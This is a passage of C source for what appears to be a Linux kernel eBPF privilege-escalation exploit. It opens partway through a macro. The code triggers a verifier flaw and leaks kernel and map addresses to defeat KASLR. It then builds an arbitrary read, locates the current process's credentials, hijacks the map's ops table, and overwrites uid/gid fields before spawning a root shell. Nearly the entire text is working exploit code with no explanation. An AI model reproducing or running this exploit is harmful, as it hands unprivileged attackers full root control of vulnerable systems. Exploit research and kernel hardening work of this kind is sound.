/* overwrite spin_lock_off */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xE4), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0x2000), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite max_entries */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x8), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0xffffffff), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite map_type */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xC), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 23), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite the map->ops */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x18), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(2, __map_fd, BPF_REG_4), \
BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_4, 0), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_5, 0)

size_t fake_ops_addr;
size_t map_addr;
size_t map_ops_addr;
size_t current_task;
size_t current_cred;

static size_t read_arbitrary_addr_4_bytes(int map_fd, int idx){
size_t data;
int ret;
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
READ_ARBITRARY_ADDR(map_fd, idx),
BPF_EXIT_INSN()};

ret = run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
if (ret < 0){
return 0;
}

struct bpf_map_info info;
union bpf_attr attr = {
.info.bpf_fd = map_fd,
.info.info_len = sizeof(info),
.info.info = (uint64_t)&info,
};

memset(&info, 0, sizeof(info));
ret = bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
if (ret < 0){
return 0;
}
data = info.btf_id;
return data;
}

size_t read_arbitrary_addr(int map_fd, size_t addr)
{
size_t data;
int key;
size_t value[0x1000];

key = 1;
value[0] = addr;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
key = 2;
value[0] = addr + 4;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
data = read_arbitrary_addr_4_bytes(map_fd, 2);
data <<= 32;
data += read_arbitrary_addr_4_bytes(map_fd, 1);
return data;
}

void make_arbitrary_write_ops(int map_fd){
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
MAKE_ARBITRARY_WRITE_OPS(map_fd),
BPF_EXIT_INSN()};
int key;
size_t per_ops_ptr, value[0x1000], value_idx;
struct bpf_map_ops *ops_data;

fake_ops_addr = map_addr + 0x110 + MAP_SIZE; /* save fake ops addr into map */

value_idx = 0; /* read ops */
for (size_t i = 0; i < sizeof(struct bpf_map_ops); i += 8){
per_ops_ptr = read_arbitrary_addr(map_fd, map_ops_addr + i);
value[value_idx++] = per_ops_ptr;
}

ops_data = (struct bpf_map_ops *)value; /* load ops */
ops_data->map_push_elem = (void *)(ARRAY_MAP_GET_NEXT_KEY + kernel_offset);
key = 1;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

key = 2;
value[0] = fake_ops_addr;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
}

int print_hex(void *p, int size){
int i;
unsigned char *buf = (unsigned char *)p;

if(size % sizeof(void *)){
return 1;
}
printf("--------------------------------------------------------------------------------\n");
for (i = 0; i < size; i += sizeof(void *)){
printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%lx\n",
i, buf[i+0], buf[i+1], buf[i+2], buf[i+3], buf[i+4], buf[i+5], buf[i+6], buf[i+7], *(unsigned long*)&buf[i]);
}
return 0;
}

int main(int argc , char **argv, char **envp)
{
int map_fd;
int key;
size_t value[0x1000];
int log_fd;

map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, MAP_SIZE, 0x100);
if (map_fd < 0) {
err_exit("FAILED to create eBPF map!");
}

key = 0;
value[0] = 0;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0) {
err_exit("FAILED to load value into map!");
}

puts("leak map_ops_addr");
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
LEAK_MAP_OPS(map_fd),
BPF_EXIT_INSN()
};
if(run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 1) < 0){
err_exit("FAILED to run bpf prog!");
};

key = 1;
if (bpf_map_lookup_elem(map_fd, &key, &value) < 0){
err_exit("FAILED to look up value!");
}
print_hex(value,0x10);
map_ops_addr = value[0];
printf("map_ops_addr: 0x%lx\n", map_ops_addr);

kernel_offset = map_ops_addr - ARRAY_MAP_OPS;
kernel_base += kernel_offset;
init_cred = INIT_CRED + kernel_offset;
printf("map_ops_addr: 0x%lx\n", map_ops_addr);
printf("kernel_base: 0x%lx\n", kernel_base);
printf("kernel_offset: 0x%lx\n", kernel_offset);

puts("leak map_addr");
struct bpf_insn prog2[] = {
TRIGGER_VULN(map_fd),
LEAK_MAP_ADDR(map_fd),
BPF_EXIT_INSN()
};
if(run_bpf_prog(prog2, sizeof(prog2) / sizeof(prog2[0]), 1, 1) < 0){
err_exit("FAILED to run bpf prog!");
};

key = 1;
if (bpf_map_lookup_elem(map_fd, &key, &value) < 0){
err_exit("FAILED to look up value!");
}
print_hex(value,0x10);
map_addr = value[0] - 0x110;
printf("map_addr: 0x%lx\n", map_addr);

size_t next_task = INIT_TASK + kernel_offset + 0x818;
size_t data;

prctl(PR_SET_NAME, "11111111");
do{
next_task = read_arbitrary_addr(map_fd, next_task);
data = read_arbitrary_addr(map_fd, next_task + 0x2d0);
} while (data != *(size_t *)"11111111");

current_task = next_task - 0x818;
current_cred = read_arbitrary_addr(map_fd, current_task + 0xad8);
printf("current_task: 0x%lx\n", current_task);
printf("current_cred: 0x%lx\n", current_cred);

make_arbitrary_write_ops(map_fd);

key = 0;
value[0] = -1;
for (int i = 0; i < 8; i++){
if (bpf_map_update_elem(map_fd, &key, &value[0], current_cred + 4 + 4 * i) < 0){
printf("\033[31m\033[1m[x] Failed to ovwerwrite no.%d\033[0m\n", i);
err_exit("FAILED to call ops->map_push_elem()!");
}
}
get_root_shell();

return 0;
}